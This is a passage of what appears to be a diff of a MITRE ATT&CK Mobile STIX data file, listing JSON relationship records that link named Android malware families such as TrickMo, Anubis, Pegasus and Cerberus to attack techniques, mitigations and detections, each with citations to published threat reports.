An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features. ", + "modified": "2022-04-01T13:32:19.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7defdb15-65d1-40ca-a9da-5c0484892484", + "created": "2020-04-24T17:46:31.616Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can be controlled via encrypted SMS message.(Citation: SecurityIntelligence TrickMo)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ee49e53-e75d-4e65-a71f-79919ebb08f4", + "type": "relationship", + "created": "2020-04-08T15:41:19.340Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-04-08T18:55:29.238Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can use its ransomware module to encrypt device data and hold it for ransom.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a25d58af-dbb3-4025-b91d-898c6adffcb3", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + } + ], + "modified": "2019-10-10T15:18:51.121Z", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) steals authentication tokens that can be used to access data from multiple Google applications.(Citation: Gooligan Citation)", + "relationship_type": "uses", + "source_ref": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4f366c8c-9c70-44ed-baa8-d433d5dbfe49", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). 
Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:13:18.720Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses call logs.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f", + "type": "relationship", + "created": "2020-09-11T14:54:16.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T14:54:16.640Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can encrypt exfiltrated data.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--56a255a5-9fa2-45bb-8848-fd0a68514467", + "created": "2022-04-11T20:06:56.034Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-11T20:06:56.034Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--42624ee9-1bf5-46aa-87d0-9fda0de9a06e", + "created": "2020-06-26T15:32:24.921Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. 
Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:50:47.973Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) avoids being analyzed by only activating the malware after recording a certain number of steps from the accelerometer.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22773074-4a95-48e0-905f-688ce048b5ed", + "created": "2020-04-24T17:46:31.593Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. 
Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:53:51.524Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can prevent the user from interacting with the UI by showing a WebView with a persistent cursor.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--61550ef4-41f0-4354-af5c-f47db8aca654", + "type": "relationship", + "created": "2020-06-02T14:32:31.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-02T14:32:31.910Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device’s phone number, ICCID, IMEI, and the currently active network interface (Wi-Fi or cellular).(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--681161b2-4e30-4d49-8524-6cc0d94585cb", + "created": "2023-03-16T13:33:26.925Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:33:26.925Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bb11b7d1-e661-49af-9746-9fa4c56324bf", + "created": "2023-03-20T18:59:14.759Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:59:14.759Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--295fab07-9f02-4504-9ae4-1a60c2e8c224", + "type": "relationship", + "created": "2019-09-03T20:08:00.670Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-10-10T15:19:47.960Z", + "description": " [Gustuff](https://attack.mitre.org/software/S0406) can capture files and photos from the compromised device.(Citation: Talos Gustuff Apr 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--52ad5145-3b04-4cc8-bed8-4a14501afe25", + "type": "relationship", + "created": "2020-09-11T15:55:43.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2020-09-11T15:55:43.774Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) deletes incoming SMS messages from specified numbers, including those that contain particular strings.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c438b973-c2f3-43fc-8312-2a5bbde4facb", + "created": "2023-03-20T18:43:03.537Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:03.537Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4220ec84-3c30-462b-9bad-4fb4de42cfd4", + "created": "2022-04-06T15:28:20.249Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be instructed to not grant applications unexpected or unnecessary permissions. 
", + "modified": "2022-04-06T15:28:20.249Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--59e225fa-b181-4906-9f0b-ef8f6ce7f2ef", + "created": "2022-04-05T20:14:17.442Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:14:17.442Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "target_ref": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--901492b5-b074-4631-ad6e-4178caa4164a", + "type": "relationship", + "created": "2020-12-24T22:04:28.017Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:28.017Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has recorded calls and environment audio in .amr format.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb3b32a8-6422-4d44-91e3-27a58e569963", + "type": "relationship", + "created": "2019-09-03T19:45:48.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.179Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can take screenshots of any application in the foreground.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d621873-6d3c-4660-be9a-57e2e8648236", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). 
Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:29.502Z", + "description": "[Marcher](https://attack.mitre.org/software/S0317) requests Android Device Administrator access.(Citation: Proofpoint-Marcher)", + "relationship_type": "uses", + "source_ref": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b018fe06-740b-4864-b30a-f047598506b3", + "type": "relationship", + "created": "2020-04-24T15:06:33.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T15:06:33.510Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect various pieces of device information, including OS version, phone model, and manufacturer.(Citation: TrendMicro Coronavirus Updates) ", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8ea39534-6fe9-404c-94b7-0f320af95404", + "created": "2022-04-01T15:17:21.511Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T15:17:21.511Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--77e30eee-fd48-40b4-99ec-73e97c158b58", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1", + "type": "relationship", + "created": "2020-09-11T14:54:16.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T14:54:16.650Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) has been distributed in multiple stages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b3e74ad-7cc4-4ed2-84d2-c745e6997711", + "created": "2023-02-06T20:12:17.434Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:04:59.445Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can request the `READ_CALL_LOG` permission.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3", + "created": "2023-02-06T18:50:12.251Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + 
"description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T14:40:57.100Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can check device system properties to potentially avoid running while under analysis.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--27b8153c-130e-44a7-84a9-840f4c23e2ea", + "type": "relationship", + "created": "2020-07-15T20:20:59.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.377Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can collect all accounts stored on the device.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ea2ad242-4365-4868-8beb-4a634f3ba6b7", + "type": "relationship", + "created": "2020-11-24T17:55:12.822Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.822Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can request the device’s location.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--789dd0f9-527c-49b3-93b7-851ce4961f0f", + "type": "relationship", + "created": "2019-09-03T19:45:48.492Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. 
(2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T17:15:52.637Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) One queries the device for its IMEI code and the phone number in order to validate the target of a new infection.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd29ce15-1771-470c-a74b-5ea90832ce23", + "created": "2020-12-24T22:04:27.911Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
